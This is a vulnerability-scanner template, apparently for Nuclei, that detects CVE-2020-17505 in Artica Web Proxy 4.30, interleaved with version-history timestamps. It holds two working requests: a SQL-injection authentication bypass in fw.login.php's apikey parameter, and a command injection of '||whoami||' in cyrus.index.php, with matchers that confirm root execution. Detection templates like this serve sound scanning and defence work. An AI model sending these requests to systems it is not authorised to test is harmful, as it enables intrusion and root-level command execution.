2021-01-02 04:56:15 +00:00
id : CVE-2020-17505
2020-08-20 15:38:14 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Artica Web Proxy 4.30 - OS Command Injection
2020-08-20 15:38:14 +00:00
author : dwisiswant0
severity : high
2022-07-26 13:45:11 +00:00
description : Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-17505
2023-04-19 16:20:17 +00:00
- https://blog.max0x4141.com/post/artica_proxy/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-17505
cwe-id : CWE-78
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:articatech:web_proxy:*:*:*:*:*:*:*:*
epss-score : 0.97122
2022-08-27 04:41:18 +00:00
tags : proxy,packetstorm,cve,cve2020,rce,artica
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2020-08-20 15:38:14 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-08-20 15:38:14 +00:00
- raw :
- |
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
Host : {{Hostname}}
Accept : */*
- |
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
Host : {{Hostname}}
Accept : */*
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
words :
- "array(2)"
- "Position: ||whoami||"
- "root"
condition : and
2021-09-08 12:17:19 +00:00
2020-08-20 15:38:14 +00:00
part : body
- type : status
status :
2020-08-25 22:43:40 +00:00
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/13